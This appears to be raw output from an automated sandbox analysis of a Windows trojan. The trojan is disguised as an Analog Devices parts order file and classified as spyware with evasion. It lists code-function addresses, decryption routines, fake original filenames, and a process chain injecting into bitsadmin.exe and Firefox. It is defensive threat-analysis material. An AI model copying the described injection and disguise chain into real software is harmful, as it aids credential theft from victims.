Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017CF0E0	2_2_017CF0E0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017170C0	2_2_017170C0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017BF0CC	2_2_017BF0CC
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_016FD34C	2_2_016FD34C
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017C132D	2_2_017C132D
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0175739A	2_2_0175739A
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0172D2F0	2_2_0172D2F0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017B12ED	2_2_017B12ED
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0172B2C0	2_2_0172B2C0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017152A0	2_2_017152A0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017C7571	2_2_017C7571
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017D95C3	2_2_017D95C3
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017AD5B0	2_2_017AD5B0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01701460	2_2_01701460
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017CF43F	2_2_017CF43F
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017CF7B0	2_2_017CF7B0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01755630	2_2_01755630
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017C16CC	2_2_017C16CC
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01719950	2_2_01719950
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0172B950	2_2_0172B950
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017A5910	2_2_017A5910
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0177D800	2_2_0177D800
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017138E0	2_2_017138E0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017CFB76	2_2_017CFB76
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01785BF0	2_2_01785BF0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0174DBF9	2_2_0174DBF9
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0172FB80	2_2_0172FB80
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01783A6C	2_2_01783A6C
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017CFA49	2_2_017CFA49
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017C7A46	2_2_017C7A46
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017BDAC6	2_2_017BDAC6
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01755AA0	2_2_01755AA0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017ADAAC	2_2_017ADAAC
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017B1AA3	2_2_017B1AA3
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017C7D73	2_2_017C7D73
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017C1D5A	2_2_017C1D5A
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01713D40	2_2_01713D40
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0172FDC0	2_2_0172FDC0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01789C32	2_2_01789C32
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017CFCF2	2_2_017CFCF2
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017CFF09	2_2_017CFF09
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_016D3FD5	2_2_016D3FD5
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_016D3FD2	2_2_016D3FD2
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017CFFB1	2_2_017CFFB1
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01711F92	2_2_01711F92
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01719EB0	2_2_01719EB0
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Code function: 6_2_03009832	6_2_03009832
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Code function: 6_2_030099D0	6_2_030099D0
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Code function: 6_2_030099DB	6_2_030099DB
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Code function: 6_2_0300B88B	6_2_0300B88B
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Code function: 6_2_0300988B	6_2_0300988B
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Code function: 6_2_030120B4	6_2_030120B4
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Code function: 6_2_030120F6	6_2_030120F6
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Code function: 6_2_030120FB	6_2_030120FB
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Code function: 6_2_02FFFECD	6_2_02FFFECD
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Code function: 6_2_0302A63B	6_2_0302A63B
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Code function: 6_2_0300B662	6_2_0300B662
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Code function: 6_2_0300B66B	6_2_0300B66B
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Code function: 6_2_03013EFB	6_2_03013EFB
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030DA352	7_2_030DA352
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030E03E6	7_2_030E03E6
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_0302E3F0	7_2_0302E3F0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030C0274	7_2_030C0274
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030A02C0	7_2_030A02C0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03010100	7_2_03010100
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030BA118	7_2_030BA118
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030A8158	7_2_030A8158
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030E01AA	7_2_030E01AA
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030D81CC	7_2_030D81CC
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030B2000	7_2_030B2000
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03044750	7_2_03044750
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03020770	7_2_03020770
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_0301C7C0	7_2_0301C7C0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_0303C6E0	7_2_0303C6E0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03020535	7_2_03020535
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030E0591	7_2_030E0591
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030C4420	7_2_030C4420
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030D2446	7_2_030D2446
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030CE4F6	7_2_030CE4F6
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030DAB40	7_2_030DAB40
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030D6BD7	7_2_030D6BD7
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_0301EA80	7_2_0301EA80
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03036962	7_2_03036962
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030229A0	7_2_030229A0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030EA9A6	7_2_030EA9A6
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03022840	7_2_03022840
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_0302A840	7_2_0302A840
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030068B8	7_2_030068B8
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_0304E8F0	7_2_0304E8F0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03062F28	7_2_03062F28
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03040F30	7_2_03040F30
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030C2F30	7_2_030C2F30
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03094F40	7_2_03094F40
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_0309EFA0	7_2_0309EFA0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03012FC8	7_2_03012FC8
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030DEE26	7_2_030DEE26
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03020E59	7_2_03020E59
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03032E90	7_2_03032E90
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030DCE93	7_2_030DCE93
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030DEEDB	7_2_030DEEDB
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_0302AD00	7_2_0302AD00
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030BCD1F	7_2_030BCD1F
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03038DBF	7_2_03038DBF
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_0301ADE0	7_2_0301ADE0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03020C00	7_2_03020C00
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030C0CB5	7_2_030C0CB5
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03010CF2	7_2_03010CF2
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030D132D	7_2_030D132D
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_0300D34C	7_2_0300D34C
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_0306739A	7_2_0306739A
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030252A0	7_2_030252A0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_0303B2C0	7_2_0303B2C0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030C12ED	7_2_030C12ED
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_0303D2F0	7_2_0303D2F0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030EB16B	7_2_030EB16B
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_0305516C	7_2_0305516C
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_0300F172	7_2_0300F172
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_0302B1B0	7_2_0302B1B0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030CF0CC	7_2_030CF0CC
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030270C0	7_2_030270C0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030D70E9	7_2_030D70E9
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030DF0E0	7_2_030DF0E0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030DF7B0	7_2_030DF7B0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030D16CC	7_2_030D16CC
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030D7571	7_2_030D7571
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030BD5B0	7_2_030BD5B0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030DF43F	7_2_030DF43F
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03011460	7_2_03011460
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030DFB76	7_2_030DFB76
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_0303FB80	7_2_0303FB80
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03095BF0	7_2_03095BF0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_0305DBF9	7_2_0305DBF9
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030DFA49	7_2_030DFA49
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030D7A46	7_2_030D7A46
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03093A6C	7_2_03093A6C
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03065AA0	7_2_03065AA0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030BDAAC	7_2_030BDAAC
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030C1AA3	7_2_030C1AA3
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030CDAC6	7_2_030CDAC6
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030B5910	7_2_030B5910
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03029950	7_2_03029950
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_0303B950	7_2_0303B950
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_0308D800	7_2_0308D800
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030238E0	7_2_030238E0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030DFF09	7_2_030DFF09
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03021F92	7_2_03021F92
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030DFFB1	7_2_030DFFB1
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_02FE3FD5	7_2_02FE3FD5
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_02FE3FD2	7_2_02FE3FD2
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03029EB0	7_2_03029EB0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03023D40	7_2_03023D40
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030D1D5A	7_2_030D1D5A
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030D7D73	7_2_030D7D73
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_0303FDC0	7_2_0303FDC0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03099C32	7_2_03099C32
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030DFCF2	7_2_030DFCF2
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_006B1A90	7_2_006B1A90
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_006AC8C7	7_2_006AC8C7
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_006AC8D0	7_2_006AC8D0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_006AAAF0	7_2_006AAAF0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_006ACAF0	7_2_006ACAF0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_006AAC40	7_2_006AAC40
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_006AAC35	7_2_006AAC35
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_006B5160	7_2_006B5160
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_006A1132	7_2_006A1132
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_006B3360	7_2_006B3360
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_006B335B	7_2_006B335B
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_006B3319	7_2_006B3319
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_006CB8A0	7_2_006CB8A0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_00DEE1F8	7_2_00DEE1F8
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_00DEE316	7_2_00DEE316
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_00DEE313	7_2_00DEE313
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_00DEE60C	7_2_00DEE60C
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_00DED778	7_2_00DED778

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: String function: 03055130 appears 58 times
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: String function: 0309F290 appears 103 times
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: String function: 0308EA12 appears 86 times
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: String function: 03067E54 appears 99 times
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: String function: 0300B970 appears 262 times
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: String function: 01757E54 appears 107 times
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: String function: 016FB970 appears 262 times
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: String function: 0178F290 appears 103 times
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: String function: 01745130 appears 58 times
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: String function: 0177EA12 appears 86 times

Sample file is different than original file name gathered from version info

Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1835652005.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1854483191.0000000007A90000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1839053698.0000000004419000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1839053698.0000000004419000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000000.1672252402.0000000000816000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameJAEN.exe" vs 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1856566677.0000000009C40000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000002.00000002.2276864429.00000000017FD000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Binary or memory string: OriginalFilenameJAEN.exe" vs 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe

Uses 32bit PE files

Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/2@11/8

Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe.log

Source: unknown	Process created: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe "C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe"
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process created: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe "C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe"
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Process created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\SysWOW64\bitsadmin.exe"
Source: C:\Windows\SysWOW64\bitsadmin.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process created: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe "C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe"	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Process created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\SysWOW64\bitsadmin.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Section loaded: textshaping.dll	Jump to behavior
